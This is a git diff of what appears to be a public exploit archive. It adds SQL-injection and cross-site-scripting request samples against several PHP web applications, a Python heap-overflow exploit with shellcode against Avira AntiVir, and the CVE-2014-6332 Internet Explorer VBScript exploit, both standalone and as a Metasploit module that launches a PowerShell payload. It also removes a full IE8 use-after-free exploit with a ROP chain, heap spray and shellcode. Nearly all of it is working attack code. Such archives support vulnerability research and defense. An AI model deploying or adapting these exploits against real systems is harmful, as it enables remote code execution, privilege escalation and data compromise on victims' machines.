diff --git a/platforms/php/webapps/35227.txt b/platforms/php/webapps/35227.txt
new file mode 100755
index 000000000..93913853c
--- /dev/null
+++ b/platforms/php/webapps/35227.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/45812/info
+
+Alguest is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Alguest 1.1c-patched is vulnerable; other versions may also be affected. 
+
+The following example POST request is available:
+
+POST /alguest/elimina.php HTTP/1.0
+Host: website
+Cookie: admin=1
+Content-Length: N
+send=elimina&elimina=[SQL Injection] 
\ No newline at end of file
diff --git a/platforms/php/webapps/35228.txt b/platforms/php/webapps/35228.txt
new file mode 100755
index 000000000..4c40131df
--- /dev/null
+++ b/platforms/php/webapps/35228.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/45819/info
+
+CompactCMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied script code may be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+
+CompactCMS 1.4.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/afdrukken.php?page=">[XSS]
+http://www.example.com/admin/includes/modules/permissions/permissions.Manage.php?status=notice&msg=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/35231.txt b/platforms/php/webapps/35231.txt
new file mode 100755
index 000000000..1bc8bb5cf
--- /dev/null
+++ b/platforms/php/webapps/35231.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45827/info
+
+Advanced Webhost Billing System (AWBS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AWBS 2.9.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)=' 
\ No newline at end of file
diff --git a/platforms/windows/remote/35213.html b/platforms/windows/remote/35213.html
deleted file mode 100755
index bd1f52c45..000000000
--- a/platforms/windows/remote/35213.html
+++ /dev/null
@@ -1,149 +0,0 @@
-<!--
-Exploit Title: MS14-035 Use-after-free Exploit for IE8
-Date: 10 Nov 2014
-Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy
-Tested on: IE8 with Java6 on Windows7
--->
-
-<html>
-<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
-<body>
-
-<!--
-<APPLET id="dummy" code="dummy.class" width=100 height=100>
-You need to install Java to view this page.
-</APPLET>
--->
-<div id="mydiv">x</div>
- 
-<form id="frm"></form>
-
-<div id="sprayfrm"></div>
- 
-<script type="text/javascript">
-
-spraysize = 5000;
-sprayelement = document.getElementById("sprayfrm");
-sprayelement.style.cssText = "display:none";
- 
-var data;
-offset = 0x506;
-buffer = unescape("%u2020%u2020");
-       
-		
-pivot = unescape("%u8b05%u7c34"); // stack pivot
-		
-// MSVCR71
-rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
-rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
-rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
-rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
-rop += unescape("%u5645%u7c36"); // pop esi;ret;
-rop += unescape("%u5243%u7c34"); // ret;
-rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
-rop += unescape("%u87ec%u7c34"); // call eax;
-rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
-rop += unescape("%ufdff%uffff"); // {size}
-rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
-rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
-rop += unescape("%u39fa%u7c34"); // pop edx;ret;
-rop += unescape("%uffc0%uffff"); // {flag}
-rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
-rop += unescape("%u4648%u7c35"); // pop edi;ret;
-rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
-rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
-rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
-rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
-rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
-rop += unescape("%u683f%u7c36"); // push esp;ret;
-rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010
-		
-// calc
-shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163"); 
-
-/*
-       _______0x1cc_____
-       |               |
-      \|/              |
-Junk   ROP Shellcode  Pivot  Junk
-        2		3		1
-*/	
-while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
-
-buffer += rop;
-buffer += shellcode;
-while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
-while (buffer.length < 0x1000) buffer += buffer;
-
-
-
-data = buffer.substring(0,offset) + pivot + rop + shellcode
-data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
- 
-while (data.length < 0x80000) data += data;
-
-for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
-{
-	var obj = document.createElement("button");
-	obj.title = data.substring(0,0x40000-0x58);
-	//obj.style.fontFamily = data.substring(0,0x40000-0x58);
-	sprayelement.appendChild(obj);
-}
-   
-	
-block = unescape( // Literal string to avoid heap allocation
-			"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
-			"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
-			"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
-			"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
-			"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");
-
-
-blocks = new Array();
-	
-for (i = 0; i < spraysize; i++) {		// spray 1
-	blocks.push(document.createElement("button"));
-	blocks[i].setAttribute("title",block.substring(0, block.length));
-	sprayelement.appendChild(blocks[i]);
-}
-	
-for (i = spraysize/2; i < spraysize; i++) {		// free some blocks
-	blocks[i].setAttribute("title","");
-}
-
- 
- 
-var newdiv = document.createElement('div');
-newdiv.innerHTML = "<textarea id='CTextArea'>&lt;/textarea&gt;";
- 
-document.getElementById("frm").appendChild(newdiv);
-var newdiv2 = document.createElement('div');
-newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
-document.getElementById("frm").appendChild(newdiv2);
- 
- 
-document.getElementById("CInput").checked = true;
-
-trigger = true;
-
-document.getElementById("frm").reset();
-
- 
- 
-function crash() {
- 
-	if (trigger) {
-	document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
-	CollectGarbage();
-
-	for (i = spraysize/2; i < spraysize; i++) {		// spray 2
-		blocks[i].setAttribute("title",block.substring(0, block.length));
-		}
-	}
-}
-
-</script>
- 
- </body>
-</html>
- 
\ No newline at end of file
diff --git a/platforms/windows/remote/35225.c b/platforms/windows/remote/35225.c
new file mode 100755
index 000000000..0080b4c7a
--- /dev/null
+++ b/platforms/windows/remote/35225.c
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/45807/info
+
+Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.
+
+Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.
+
+Please note that these issues affect versions of the application that are no longer supported. 
+
+#include <windows.h>
+
+int main(int argc, char* argv[])
+{
+	char buffer[0x100];
+	DWORD returned;
+	HANDLE hDevice;
+
+	hDevice = CreateFileW( L"\\\\.\\avgntdd", GENERIC_READ | GENERIC_WRITE, 0, 0, 3, 0x80, 0 );
+	if( hDevice != INVALID_HANDLE_VALUE )
+	{
+		printf("Could not open handle to guard driver.\n");
+		return 1;
+	}
+	
+	memset( buffer, 0, sizeof(buffer) );
+	
+	if( !DeviceIoControl( hDevice, 0x0CABA020C, &buffer, sizeof(buffer), 0,0, &returned, 0) )
+	{
+		printf("Could not communicate with guard driver.\n");
+		return 1;		
+	}
+	return 0;
+}
diff --git a/platforms/windows/remote/35226.py b/platforms/windows/remote/35226.py
new file mode 100755
index 000000000..756cb41aa
--- /dev/null
+++ b/platforms/windows/remote/35226.py
@@ -0,0 +1,121 @@
+source: http://www.securityfocus.com/bid/45807/info
+ 
+Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.
+ 
+Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.
+ 
+Please note that these issues affect versions of the application that are no longer supported. 
+
+#
+# Avira AntiVir personal edition avguard.exe 7.00.00.52 local heap overflow
+# Proof of Concept (PoC) exploit / target: WinXP SP1
+# bug discovered/exploit written by D.Elser
+#
+# by sending two simple TCP packets which will
+# exploit a vulnerability in the Antivir guard
+# service, the user will gain SYSTEM privileges
+#
+# this PoC code will cause the avguard service
+# to show a messagebox within an infinite loop
+
+
+from socket import *
+import sys
+
+# the first packet which is sent must
+# contain a magic ID at offset 0x18
+# and the length of the second packet 
+# to receive
+#
+# offset 0x18 : magic ID
+# offset 0x1C : length of buffer for second packet
+
+
+cpacket = "\x00\x00\x00\x00" \
+          "\x00\x00\x00\x00" \
+          "\x00\x00\x00\x00" \
+          "\x00\x00\x00\x00" \
+          "\x00\x00\x00\x00" \
+          "\x00\x00\x00\x00" \
+          "\x00\x00\x31\x06" \
+          "\x00\x00\x00\x40"
+
+
+lyrics = "\x42\x72\x65\x61\x6B\x62\x65\x61\x74\x20\x45\x72\x61\x20\x2D\x20" \
+         "\x42\x75\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x0D\x0A\x0D\x0A\x45" \
+         "\x6C\x65\x63\x74\x72\x69\x66\x79\x20\x6D\x65\x20\x79\x6F\x75\x20" \
+         "\x6D\x79\x20\x68\x61\x6C\x66\x20\x62\x61\x6B\x65\x64\x20\x79\x6F" \
+         "\x75\x74\x68\x0D\x0A\x49\x20\x6D\x65\x6D\x6F\x72\x69\x73\x65\x20" \
+         "\x79\x6F\x75\x72\x20\x66\x61\x63\x65\x20\x73\x6F\x20\x49\x20\x77" \
+         "\x6F\x6E\x27\x74\x20\x66\x6F\x72\x67\x65\x74\x20\x79\x6F\x75\x0D" \
+         "\x0A\x44\x61\x6E\x63\x69\x6E\x67\x20\x64\x65\x6D\x6F\x6E\x73\x20" \
+         "\x69\x6E\x20\x74\x68\x65\x20\x66\x69\x72\x65\x6C\x69\x67\x68\x74" \
+         "\x20\x79\x65\x73\x20\x69\x74\x27\x73\x20\x74\x72\x75\x65\x0D\x0A" \
+         "\x52\x65\x6D\x69\x6E\x64\x20\x6D\x65\x20\x6F\x66\x20\x74\x68\x65" \
+         "\x20\x6E\x69\x67\x68\x74\x20\x49\x20\x66\x69\x72\x73\x74\x20\x6D" \
+         "\x65\x74\x20\x79\x6F\x75\x0D\x0A\x43\x72\x69\x74\x69\x63\x69\x73" \
+         "\x65\x20\x6D\x65\x20\x66\x6F\x72\x20\x6D\x79\x20\x6D\x69\x73\x2D" \
+         "\x73\x70\x65\x6E\x74\x20\x79\x6F\x75\x74\x68\x0D\x0A\x4E\x6F\x20" \
+         "\x74\x68\x72\x69\x6C\x6C\x20\x6E\x6F\x20\x6C\x69\x65\x20\x6D\x6F" \
+         "\x72\x65\x20\x63\x72\x61\x7A\x79\x20\x74\x68\x61\x6E\x20\x74\x68" \
+         "\x65\x20\x74\x72\x75\x74\x68\x0D\x0A\x59\x6F\x75\x20\x67\x69\x76" \
+         "\x65\x20\x6D\x65\x20\x70\x72\x65\x63\x69\x6F\x75\x73\x20\x74\x68" \
+         "\x69\x6E\x67\x73\x20\x49\x20\x74\x68\x72\x6F\x77\x20\x74\x68\x65" \
+         "\x6D\x20\x61\x6C\x6C\x20\x61\x77\x61\x79\x0D\x0A\x41\x6E\x64\x20" \
+         "\x6E\x6F\x77\x20\x79\x6F\x75\x20\x66\x72\x65\x65\x20\x6D\x79\x20" \
+         "\x62\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x72\x20\x73\x63\x61\x72" \
+         "\x65\x64\x20\x77\x68\x61\x74\x20\x49\x20\x6D\x69\x67\x68\x74\x20" \
+         "\x73\x61\x79\x0D\x0A\x0D\x0A\x53\x70\x65\x61\x6B\x20\x6E\x6F\x20" \
+         "\x6C\x69\x65\x2C\x20\x49\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20" \
+         "\x74\x72\x75\x74\x68\x0D\x0A\x53\x61\x76\x65\x20\x6D\x79\x20\x62" \
+         "\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x20\x62\x72\x65\x61\x6B\x20" \
+         "\x74\x68\x65\x20\x72\x75\x6C\x65\x73\x0D\x0A\x54\x69\x6D\x65\x20" \
+         "\x77\x69\x6C\x6C\x20\x74\x65\x6C\x6C\x20\x79\x65\x61\x68\x20\x77" \
+         "\x68\x6F\x20\x69\x73\x20\x77\x68\x6F\x0D\x0A\x53\x69\x64\x65\x20" \
+         "\x62\x79\x20\x73\x69\x64\x65\x20\x77\x65\x27\x72\x65\x20\x62\x75" \
+         "\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x00"
+
+
+# main part of shellcode
+shellcode = "\x90\x8d\x46\x1b" \
+            "\x50\x05\x04\x00" \
+            "\x00\x00\x50\x05" \
+            "\x19\x00\x00\x00" \
+            "\x50\xb8\x2f\x71" \
+            "\x42\x00\xff\xd0" \
+            "\x90\xeb\xe5\x10" \
+            "\x20\x01\x00" \
+            "I got SYSTEM privileges!\x00" + lyrics
+
+# fill shellcode up to a specific length
+for i in range(0, 0x4000 - 0x20 - len(shellcode)):
+	shellcode = shellcode + "\x40"
+
+# second part of shellcode which contains
+# the pointers to be overwritten and code
+# which jumps to main part of our shellcode
+shellcode = shellcode + "\xEB\x0E\x90\x90" \
+                        "\x90\x90\x90\x90" \
+                        "\x52\xBF\x04\x78" \
+                        "\xB4\x73\xED\x77" \
+                        "\x8B\x57\x6C\x8B" \
+                        "\xF2\x81\xEE\xE0" \
+                        "\x3F\x00\x00\xFF" \
+                        "\xE6\x90\x90\x90" \
+                        "\x90\x90\x90\x90" \
+                        "\x90\x90\x90\x90" \
+
+	
+s = socket(AF_INET,SOCK_STREAM)
+s.settimeout(1)
+s.connect(("127.0.0.1",18350))
+print "Avira Antivir avguard.exe 7.00.00.52 local heap overflow.\n" \
+      "Exploit compatible with XP SP1.\n"
+
+print "Sending control packet (size: 0x%x)" % (len(cpacket))
+s.sendall(cpacket)
+print "Sending shellcode packet (size: 0x%x)" % (len(shellcode))
+s.sendall(shellcode)
+print "avguard response:"
+print s.recv(1024)
+sys.exit()
diff --git a/platforms/windows/remote/35229.html b/platforms/windows/remote/35229.html
new file mode 100755
index 000000000..f2ed021ec
--- /dev/null
+++ b/platforms/windows/remote/35229.html
@@ -0,0 +1,211 @@
+//*
+   allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
+   cve-2014-6332 exploit
+   https://twitter.com/yuange75
+   http://hi.baidu.com/yuange1975
+  
+*//
+
+<!doctype html>
+<html>
+<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
+<head>
+</head>
+<body>
+
+<SCRIPT LANGUAGE="VBScript">
+
+function runmumaa() 
+On Error Resume Next
+set shell=createobject("Shell.Application")
+shell.ShellExecute "notepad.exe"
+end function
+
+</script>
+
+<SCRIPT LANGUAGE="VBScript">
+ 
+dim   aa()
+dim   ab()
+dim   a0
+dim   a1
+dim   a2
+dim   a3
+dim   win9x
+dim   intVersion
+dim   rnda
+dim   funclass
+dim   myarray
+
+Begin()
+
+function Begin()
+  On Error Resume Next
+  info=Navigator.UserAgent
+
+  if(instr(info,"Win64")>0)   then
+     exit   function
+  end if
+
+  if (instr(info,"MSIE")>0)   then 
+             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
+  else
+     exit   function  
+             
+  end if
+
+  win9x=0
+
+  BeginInit()
+  If Create()=True Then
+     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
+     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
+
+     if(intVersion<4) then
+         document.write("<br> IE")
+         document.write(intVersion)
+         runshellcode()                    
+     else  
+          setnotsafemode()
+     end if
+  end if
+end function
+
+function BeginInit()
+   Randomize()
+   redim aa(5)
+   redim ab(5)
+   a0=13+17*rnd(6)
+   a3=7+3*rnd(5)
+end function
+
+function Create()
+  On Error Resume Next
+  dim i
+  Create=False
+  For i = 0 To 400
+    If Over()=True Then
+    '   document.write(i)     
+       Create=True
+       Exit For
+    End If 
+  Next
+end function
+
+sub testaa()
+end sub
+
+function mydata()
+    On Error Resume Next
+     i=testaa
+     i=null
+     redim  Preserve aa(a2)  
+  
+     ab(0)=0
+     aa(a1)=i
+     ab(0)=6.36598737437801E-314
+
+     aa(a1+2)=myarray
+     ab(2)=1.74088534731324E-310  
+     mydata=aa(a1)
+     redim  Preserve aa(a0)  
+end function 
+
+
+function setnotsafemode()
+    On Error Resume Next
+    i=mydata()  
+    i=readmemo(i+8)
+    i=readmemo(i+16)
+    j=readmemo(i+&h134)  
+    for k=0 to &h60 step 4
+        j=readmemo(i+&h120+k)
+        if(j=14) then
+              j=0          
+              redim  Preserve aa(a2)             
+     aa(a1+2)(i+&h11c+k)=ab(4)
+              redim  Preserve aa(a0)  
+
+     j=0 
+              j=readmemo(i+&h120+k)   
+         
+               Exit for
+           end if
+
+    next 
+    ab(2)=1.69759663316747E-313
+    runmumaa() 
+end function
+
+function Over()
+    On Error Resume Next
+    dim type1,type2,type3
+    Over=False
+    a0=a0+a3
+    a1=a0+2
+    a2=a0+&h8000000
+  
+    redim  Preserve aa(a0) 
+    redim   ab(a0)     
+  
+    redim  Preserve aa(a2)
+  
+    type1=1
+    ab(0)=1.123456789012345678901234567890
+    aa(a0)=10
+          
+    If(IsObject(aa(a1-1)) = False) Then
+       if(intVersion<4) then
+           mem=cint(a0+1)*16             
+           j=vartype(aa(a1-1))
+           if((j=mem+4) or (j*8=mem+8)) then
+              if(vartype(aa(a1-1))<>0)  Then    
+                 If(IsObject(aa(a1)) = False ) Then             
+                   type1=VarType(aa(a1))
+                 end if               
+              end if
+           else
+             redim  Preserve aa(a0)
+             exit  function
+
+           end if 
+        else
+           if(vartype(aa(a1-1))<>0)  Then    
+              If(IsObject(aa(a1)) = False ) Then
+                  type1=VarType(aa(a1))
+              end if               
+            end if
+        end if
+    end if
+              
+    
+    If(type1=&h2f66) Then         
+          Over=True      
+    End If  
+    If(type1=&hB9AD) Then
+          Over=True
+          win9x=1
+    End If  
+
+    redim  Preserve aa(a0)          
+        
+end function
+
+function ReadMemo(add) 
+    On Error Resume Next
+    redim  Preserve aa(a2)  
+  
+    ab(0)=0   
+    aa(a1)=add+4     
+    ab(0)=1.69759663316747E-313       
+    ReadMemo=lenb(aa(a1))  
+   
+    ab(0)=0    
+ 
+    redim  Preserve aa(a0)
+end function
+
+</script>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/remote/35230.rb b/platforms/windows/remote/35230.rb
new file mode 100755
index 000000000..80be98bf5
--- /dev/null
+++ b/platforms/windows/remote/35230.rb
@@ -0,0 +1,443 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Windows OLE Automation Array Remote Code Execution",
+      'Description'    => %q{
+          This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability. 
+		  Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.  
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'IBM', # Discovery
+	  'yuange <twitter.com/yuange75>', # PoC
+	  'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit
+          'Wesley Neelen <security[at]forsec.nl>'  #Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-6332' ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars'        => "\x00",
+        },
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC'         => "none"
+        },
+      'Platform'       => 'win',
+      'Targets'        =>  
+        [
+          [ 'Automatic', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "November 12 2014",
+      'DefaultTarget'  => 0))
+  end
+
+  def on_request_uri(cli, request)
+	payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
+	payl.slice! "powershell.exe "
+    
+	html = <<-EOS
+<!doctype html>
+
+<html>
+
+<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
+
+<head>
+
+</head>
+
+<body>
+
+
+<SCRIPT LANGUAGE="VBScript">
+
+
+function trigger() 
+
+On Error Resume Next
+
+set shell=createobject("Shell.Application")
+
+shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1
+
+end function
+
+
+</script>
+
+
+<SCRIPT LANGUAGE="VBScript">
+
+ 
+
+dim   aa()
+
+dim   ab()
+
+dim   a0
+
+dim   a1
+
+dim   a2
+
+dim   a3
+
+dim   win9x
+
+dim   intVersion
+
+dim   rnda
+
+dim   funclass
+
+dim   myarray
+
+
+Begin()
+
+
+function Begin()
+
+  On Error Resume Next
+
+  info=Navigator.UserAgent
+
+
+  if(instr(info,"Win64")>0)   then
+
+     exit   function
+
+  end if
+
+
+  if (instr(info,"MSIE")>0)   then 
+
+             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
+
+  else
+
+     exit   function  
+
+             
+
+  end if
+
+
+  win9x=0
+
+
+  BeginInit()
+
+  If Create()=True Then
+
+     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
+
+     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
+
+
+     if(intVersion<4) then
+
+         document.write("<br> IE")
+
+         document.write(intVersion)
+
+         runshellcode()                    
+
+     else  
+
+          setnotsafemode()
+
+     end if
+
+  end if
+
+end function
+
+
+function BeginInit()
+
+   Randomize()
+
+   redim aa(5)
+
+   redim ab(5)
+
+   a0=13+17*rnd(6)
+
+   a3=7+3*rnd(5)
+
+end function
+
+
+function Create()
+
+  On Error Resume Next
+
+  dim i
+
+  Create=False
+
+  For i = 0 To 400
+
+    If Over()=True Then
+
+    '   document.write(i)     
+
+       Create=True
+
+       Exit For
+
+    End If 
+
+  Next
+
+end function
+
+
+sub testaa()
+
+end sub
+
+
+function mydata()
+
+    On Error Resume Next
+
+     i=testaa
+
+     i=null
+
+     redim  Preserve aa(a2)  
+
+  
+
+     ab(0)=0
+
+     aa(a1)=i
+
+     ab(0)=6.36598737437801E-314
+
+
+     aa(a1+2)=myarray
+
+     ab(2)=1.74088534731324E-310  
+
+     mydata=aa(a1)
+
+     redim  Preserve aa(a0)  
+
+end function 
+
+
+
+function setnotsafemode()
+
+    On Error Resume Next
+
+    i=mydata()  
+
+    i=readmemo(i+8)
+
+    i=readmemo(i+16)
+
+    j=readmemo(i+&h134)  
+
+    for k=0 to &h60 step 4
+
+        j=readmemo(i+&h120+k)
+
+        if(j=14) then
+
+              j=0          
+
+              redim  Preserve aa(a2)             
+
+     aa(a1+2)(i+&h11c+k)=ab(4)
+
+              redim  Preserve aa(a0)  
+
+
+     j=0 
+
+              j=readmemo(i+&h120+k)   
+
+         
+
+               Exit for
+
+           end if
+
+
+    next 
+
+    ab(2)=1.69759663316747E-313
+
+    trigger() 
+
+end function
+
+
+function Over()
+
+    On Error Resume Next
+
+    dim type1,type2,type3
+
+    Over=False
+
+    a0=a0+a3
+
+    a1=a0+2
+
+    a2=a0+&h8000000
+
+  
+
+    redim  Preserve aa(a0) 
+
+    redim   ab(a0)     
+
+  
+
+    redim  Preserve aa(a2)
+
+  
+
+    type1=1
+
+    ab(0)=1.123456789012345678901234567890
+
+    aa(a0)=10
+
+          
+
+    If(IsObject(aa(a1-1)) = False) Then
+
+       if(intVersion<4) then
+
+           mem=cint(a0+1)*16             
+
+           j=vartype(aa(a1-1))
+
+           if((j=mem+4) or (j*8=mem+8)) then
+
+              if(vartype(aa(a1-1))<>0)  Then    
+
+                 If(IsObject(aa(a1)) = False ) Then             
+
+                   type1=VarType(aa(a1))
+
+                 end if               
+
+              end if
+
+           else
+
+             redim  Preserve aa(a0)
+
+             exit  function
+
+
+           end if 
+
+        else
+
+           if(vartype(aa(a1-1))<>0)  Then    
+
+              If(IsObject(aa(a1)) = False ) Then
+
+                  type1=VarType(aa(a1))
+
+              end if               
+
+            end if
+
+        end if
+
+    end if
+
+              
+
+    
+
+    If(type1=&h2f66) Then         
+
+          Over=True      
+
+    End If  
+
+    If(type1=&hB9AD) Then
+
+          Over=True
+
+          win9x=1
+
+    End If  
+
+
+    redim  Preserve aa(a0)          
+
+        
+
+end function
+
+
+function ReadMemo(add) 
+
+    On Error Resume Next
+
+    redim  Preserve aa(a2)  
+
+  
+
+    ab(0)=0   
+
+    aa(a1)=add+4     
+
+    ab(0)=1.69759663316747E-313       
+
+    ReadMemo=lenb(aa(a1))  
+
+   
+
+    ab(0)=0    
+
+ 
+
+    redim  Preserve aa(a0)
+
+end function
+
+
+</script>
+
+
+</body>
+
+</html>
+    EOS
+
+    print_status("Sending html")
+    send_response(cli, html, {'Content-Type'=>'text/html'})
+
+  end
+
+end